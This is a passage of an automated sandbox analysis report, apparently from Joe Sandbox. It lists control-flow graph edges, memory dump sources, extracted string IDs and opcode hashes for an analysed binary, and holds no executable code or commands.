7ff7645c92a0 1215->1238 1217->1179 1241 7ff7645b749c-7ff7645b74cc 1217->1241 1218->1179 1245 7ff7645b79c3-7ff7645b79d4 1220->1245 1221->1179 1244 7ff7645b7510-7ff7645b7521 1221->1244 1223->1179 1224->1179 1248 7ff7645b779c-7ff7645b77a1 1224->1248 1225->1179 1249 7ff7645b7560-7ff7645b75b4 call 7ff7645b5c00 1225->1249 1226->1179 1227->1179 1251 7ff7645b77be-7ff7645b7c87 call 7ff764602d20 1227->1251 1228->1250 1230->1179 1253 7ff7645b75dd-7ff7645b761d 1230->1253 1231->1179 1254 7ff7645b73e4-7ff7645b73ec 1232->1254 1235->1179 1237->1179 1238->1179 1241->1232 1244->1179 1245->1179 1248->1179 1249->1245 1250->1254 1253->1179 1254->1179 1281 7ff7645b78dc-7ff7645b798f call 7ff7645c92a0 * 3 1279->1281 1281->1179
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: &i$&i$&i$&i$&i
                                                                                                      • API String ID: 0-708512779
                                                                                                      • Opcode ID: 09509fada7147cf04c46f04f285c91236162227e14fe6f9cb9a8b95d3f3aa6e0
                                                                                                      • Instruction ID: c4e6ed2116b439eb9262d8c854e52babda6432b6ea3beb6e45990d2ec51bdf9d
                                                                                                      • Opcode Fuzzy Hash: 09509fada7147cf04c46f04f285c91236162227e14fe6f9cb9a8b95d3f3aa6e0
                                                                                                      • Instruction Fuzzy Hash: 41222A26F18602C6FB28BF7AA4F537E67A2EB59794F500139DD1E07BD6CE2C94428710
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1299 7ff7645b32a0-7ff7645b332f 1300 7ff7645b33d0-7ff7645b33d8 1299->1300 1301 7ff7645b3410-7ff7645b3415 1300->1301 1302 7ff7645b33da-7ff7645b33df 1300->1302 1305 7ff7645b34b0-7ff7645b34b5 1301->1305 1306 7ff7645b341b-7ff7645b3420 1301->1306 1303 7ff7645b33e1-7ff7645b33e6 1302->1303 1304 7ff7645b3450-7ff7645b3455 1302->1304 1313 7ff7645b3508-7ff7645b350d 1303->1313 1314 7ff7645b33ec-7ff7645b33f1 1303->1314 1309 7ff7645b35f0-7ff7645b35f5 1304->1309 1310 7ff7645b345b-7ff7645b3463 1304->1310 1311 7ff7645b34bb-7ff7645b34c0 1305->1311 1312 7ff7645b365c-7ff7645b3661 1305->1312 1307 7ff7645b35c2-7ff7645b35c7 1306->1307 1308 7ff7645b3426-7ff7645b342b 1306->1308 1317 7ff7645b3823-7ff7645b3839 1307->1317 1318 7ff7645b35cd-7ff7645b35d4 1307->1318 1315 7ff7645b3431-7ff7645b3438 1308->1315 1316 7ff7645b37a5-7ff7645b37cb 1308->1316 1320 7ff7645b383e-7ff7645b384f 1309->1320 1321 7ff7645b35fb-7ff7645b3602 1309->1321 1310->1300 1319 7ff7645b3469-7ff7645b3470 1310->1319 1322 7ff7645b37d0-7ff7645b381e call 7ff7645c92a0 1311->1322 1323 7ff7645b34c6-7ff7645b34cd 1311->1323 1328 7ff7645b3854-7ff7645b391c call 7ff7645c92a0 * 2 1312->1328 1329 7ff7645b3667-7ff7645b366e 1312->1329 1326 7ff7645b3513-7ff7645b351a 1313->1326 1327 7ff7645b3334-7ff7645b33c9 call 7ff7645c92a0 * 2 1313->1327 1324 7ff7645b33f7-7ff7645b33fc 1314->1324 1325 7ff7645b36fd-7ff7645b3711 1314->1325 1315->1300 1337 7ff7645b343a-7ff7645b343f 1315->1337 1316->1300 1317->1300 1318->1300 1331 7ff7645b35da-7ff7645b35eb 1318->1331 1319->1300 1338 7ff7645b3476-7ff7645b34a5 1319->1338 1320->1300 1321->1300 1332 7ff7645b3608-7ff7645b364b call 7ff764602cb0 1321->1332 1322->1300 1323->1300 1339 7ff7645b34d3-7ff7645b3503 1323->1339 1334 7ff7645b3402-7ff7645b3409 1324->1334 1335 7ff7645b3716-7ff7645b37a0 call 7ff7645c92a0 * 2 1324->1335 1325->1300 1326->1300 1340 7ff7645b3520-7ff7645b35a6 call 7ff7645c92a0 1326->1340 1327->1300 1328->1300 1329->1300 1336 7ff7645b3674-7ff7645b36f8 call 7ff7645c92a0 * 2 1329->1336 1331->1300 1353 7ff7645b364f-7ff7645b3657 1332->1353 1334->1300 1350 7ff7645b340b-7ff7645b3942 call 7ff764602d20 1334->1350 1335->1300 1336->1300 1337->1300 1345 7ff7645b35ba-7ff7645b35bd 1338->1345 1348 7ff7645b35ab-7ff7645b35b5 1339->1348 1340->1348 1345->1353 1348->1345 1353->1300
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 6E$6E$6E$6E$6E
                                                                                                      • API String ID: 0-3297435000
                                                                                                      • Opcode ID: f1b48199b8f6b236142ae86e24071aabd76b38c27eaf9d1adc6721592e89fbd7
                                                                                                      • Instruction ID: d4b5796809989e7a15ce7349d3aa6c2249b8ccfa168ae753e6a94b03779ce599
                                                                                                      • Opcode Fuzzy Hash: f1b48199b8f6b236142ae86e24071aabd76b38c27eaf9d1adc6721592e89fbd7
                                                                                                      • Instruction Fuzzy Hash: 7CF11862F04202CBFB28ABB7A4E177E67A1AB55758F500039DE0EA7FD2DD3C99418710
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: T]zL$U]zL$U]zL$U]zL
                                                                                                      • API String ID: 0-2926435357
                                                                                                      • Opcode ID: b07e433c66f0f01446dd3b4d79b87c932f8ee47d7bfc10b5f3c31559f7a256e9
                                                                                                      • Instruction ID: 9afc99922abbfb69a2d81adcf03dfd6a00c2dc5c2038df6d66d5e1169927132d
                                                                                                      • Opcode Fuzzy Hash: b07e433c66f0f01446dd3b4d79b87c932f8ee47d7bfc10b5f3c31559f7a256e9
                                                                                                      • Instruction Fuzzy Hash: 81027926B0D54ACBEA686E3AA4F133DB2929FC5350FA44535E91FC7AE5CE1DEC018610
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: vTwd$wTwd$wTwd$wTwd
                                                                                                      • API String ID: 0-3342006220
                                                                                                      • Opcode ID: 6b7a60781cbb3e6bd4b76f746d5eaa2d6323e13f91b713b8ea5fd330cec93e31
                                                                                                      • Instruction ID: b22e8139f2b7bb6bf8ac67518467f5dbb106a1185a4238eed483afe5e121aaf0
                                                                                                      • Opcode Fuzzy Hash: 6b7a60781cbb3e6bd4b76f746d5eaa2d6323e13f91b713b8ea5fd330cec93e31
                                                                                                      • Instruction Fuzzy Hash: A2918C37F08145DBDA519F2EA8C002DF392ABD0760FE58231EA58C77E5CA2DEC469B50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: .;:$.;:$.;:
                                                                                                      • API String ID: 0-3582265319
                                                                                                      • Opcode ID: 82a8d34c0d556f6f0db020b6204a242b4a16fce40fa484e9913518dde42fb704
                                                                                                      • Instruction ID: 7e912763ddcba8171ea61e9399e24d5fe54cf7ef2e3ee86da969f1f8a923b0c1
                                                                                                      • Opcode Fuzzy Hash: 82a8d34c0d556f6f0db020b6204a242b4a16fce40fa484e9913518dde42fb704
                                                                                                      • Instruction Fuzzy Hash: 3ED13D21A1C745C7DA38AF1AA0D42BEE7A0EF80B54F545139FA4E07BA5CE7CD4808F61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ,5UG$,5UG$,5UG
                                                                                                      • API String ID: 0-675831717
                                                                                                      • Opcode ID: e68fad0a689f0246bbfdcaa26279e81d96fb3218d4206283ea12e6dda52d8921
                                                                                                      • Instruction ID: 36e63ccd2df45b89d44ad7757d955f4cba10120d686f207fdb0a7274b9c4fc9c
                                                                                                      • Opcode Fuzzy Hash: e68fad0a689f0246bbfdcaa26279e81d96fb3218d4206283ea12e6dda52d8921
                                                                                                      • Instruction Fuzzy Hash: 27A14C7670C202CBEB149E2A99C002DB6D2BFD8350FA88532D95DC72E5CA3DEC45CB55
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 44w$44w$44w
                                                                                                      • API String ID: 0-3007227283
                                                                                                      • Opcode ID: 980d25a81e3d910786fbceb76ce9b94e2a217e7d6efe4aacfdb0208db9b28d91
                                                                                                      • Instruction ID: d2e02315e2090ad24763226c6b46c0470c9ce8ba5b063503c84b5724ef30a6d8
                                                                                                      • Opcode Fuzzy Hash: 980d25a81e3d910786fbceb76ce9b94e2a217e7d6efe4aacfdb0208db9b28d91
                                                                                                      • Instruction Fuzzy Hash: 78917C72F0C506DBDA249E2AA8D053DF6D2AB81350FA8C531E958C73F6D93DEC41AB50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: t:b$t:b$t:b
                                                                                                      • API String ID: 0-810174569
                                                                                                      • Opcode ID: 7b306665ca124b3de91fee6b380d5bc802ca874535412f593734861fa86cfd93
                                                                                                      • Instruction ID: 0f7660a7c8af5708169cac834e43e1f78dc2998dae8dfee1360b6070cde07a9f
                                                                                                      • Opcode Fuzzy Hash: 7b306665ca124b3de91fee6b380d5bc802ca874535412f593734861fa86cfd93
                                                                                                      • Instruction Fuzzy Hash: 88919E6290C946DED61EFE2695E023DF3D2AF81360F449630DA2E43BE5DBBCE6058710
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: C}$D}$D}
                                                                                                      • API String ID: 0-1906828564
                                                                                                      • Opcode ID: 5f74f428007807354c5e064e7b98a79646a7b49637bcd705ac47e58b8f2840c0
                                                                                                      • Instruction ID: 9d3d3c0cd1490b783fdbc254ec90545c1dc49a2a46b3a9b8fcd5d24eb1153d31
                                                                                                      • Opcode Fuzzy Hash: 5f74f428007807354c5e064e7b98a79646a7b49637bcd705ac47e58b8f2840c0
                                                                                                      • Instruction Fuzzy Hash: B9816A1270C142D7EF6C5E2A75E8A7EB6C3AF86744F684938DC0E87BD6C92CE8454E11
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: pH4$pH4
                                                                                                      • API String ID: 0-1794507869
                                                                                                      • Opcode ID: d4ca92abdd35dc87a66319a3f731d70aba16736b4364a61590b7d0346d6587fb
                                                                                                      • Instruction ID: eb0270e8ae955ec5d2a42dcec6d68730aea515ab7d564894d9e119bd84e98125
                                                                                                      • Opcode Fuzzy Hash: d4ca92abdd35dc87a66319a3f731d70aba16736b4364a61590b7d0346d6587fb
                                                                                                      • Instruction Fuzzy Hash: B4A16C26B0C242D7D6319E2AD9C062BFBA3EB81350F648635E955C77E5CA3CEC458F60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Jz]6$Jz]6
                                                                                                      • API String ID: 0-1495602739
                                                                                                      • Opcode ID: 6a07c786dd2af207a682b533cc5d74da4931a498b339bddfae3c191fa5bb4d7d
                                                                                                      • Instruction ID: e6d1669bba41a5d6fa70e820cadb4bdefab573214e12f77005bd150f8a85cd6b
                                                                                                      • Opcode Fuzzy Hash: 6a07c786dd2af207a682b533cc5d74da4931a498b339bddfae3c191fa5bb4d7d
                                                                                                      • Instruction Fuzzy Hash: 8D416766F04142C6FB2C6F7B60E13BE66929B86398F645039DD2F03FC6CC2D95824B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: c
                                                                                                      • API String ID: 0-112844655
                                                                                                      • Opcode ID: 0f80c1449ea0fa9c6a96c7b7519eacae0ad01310e6f046cd670f3a398d321b91
                                                                                                      • Instruction ID: b38fd464197fcaea2d53afe3fd96bbb44d7b43b917a2aa7de5986a6a6577727d
                                                                                                      • Opcode Fuzzy Hash: 0f80c1449ea0fa9c6a96c7b7519eacae0ad01310e6f046cd670f3a398d321b91
                                                                                                      • Instruction Fuzzy Hash: F1320A16A0C6C5D7DA791A2525F037EEBD29FC3340FA940BAC58F07A9BCD1C9C498725
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c360a1e7dfe6c72658459e3ee820b6495c4c21557a7051d9a2b6bb70681d9e94
                                                                                                      • Instruction ID: ca0f42d82546de5a898b2ead80792323fc4c4b0e8d162ec1d7354f70d07b3152
                                                                                                      • Opcode Fuzzy Hash: c360a1e7dfe6c72658459e3ee820b6495c4c21557a7051d9a2b6bb70681d9e94
                                                                                                      • Instruction Fuzzy Hash: A4D16926B0D502C7EB286E3A68D0A7EB6D29FC6314F544139D95E83BF2CE2CD9458A14
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 245d9c46f7d41a1e6d0eb3a05c93679d6ef352b954ae0cf32af4a90a8195c918
                                                                                                      • Instruction ID: 0a0a4cfc8ce651afa330aaa2327275c81145b4feaa94a0548ce42fa6f0f2c383
                                                                                                      • Opcode Fuzzy Hash: 245d9c46f7d41a1e6d0eb3a05c93679d6ef352b954ae0cf32af4a90a8195c918
                                                                                                      • Instruction Fuzzy Hash: D2E1E77661C649C7E5789E1A90D4139F7A2EBC4790FA4013EDA4E47FE5CE2CE8418F21
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e27d64064907930173d7950059abdc981c81a2b3f6b63498e388086948221ef7
                                                                                                      • Instruction ID: ba9567580f6f1282d5e65eb4f7a036847ae8797bf6c93e12c5a3bee6cda077a6
                                                                                                      • Opcode Fuzzy Hash: e27d64064907930173d7950059abdc981c81a2b3f6b63498e388086948221ef7
                                                                                                      • Instruction Fuzzy Hash: 18D12C25B0C606C6FD78AE1B98E153EE2A1AF40364FA45535E61DC77E2DE2CFC428612
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b5152896219a3b162abd2383f7f122f48fd822d137cb0455e239f49132b07ddc
                                                                                                      • Instruction ID: 7972a7b581f26f8cd04517db6d6c310de87c7406509bf7e17ed7b05756e80ec1
                                                                                                      • Opcode Fuzzy Hash: b5152896219a3b162abd2383f7f122f48fd822d137cb0455e239f49132b07ddc
                                                                                                      • Instruction Fuzzy Hash: 2DD15B27B0C142C7EA745F2974E067EFAD2AFC6390FA44235D95A87AE6CD3CD8458B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.259441510.00007FF7645B1000.00000020.00020000.sdmp, Offset: 00007FF7645B0000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.259437863.00007FF7645B0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259475030.00007FF76460E000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259480757.00007FF764618000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259484471.00007FF76461C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000001.00000002.259487507.00007FF764620000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7ff7645b0000_fdcbn.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 78f7e6f369cdc0cc978acbe129cfbba3bb5ff3c2fe0ade0a9bff3d755c7cefed
                                                                                                      • Instruction ID: 542e6ddcbd9bbc5f91be85db27baa31be0aec1a13b627fa509fd63bd567ea386
                                                                                                      • Opcode Fuzzy Hash: 78f7e6f369cdc0cc978acbe129cfbba3bb5ff3c2fe0ade0a9bff3d755c7cefed
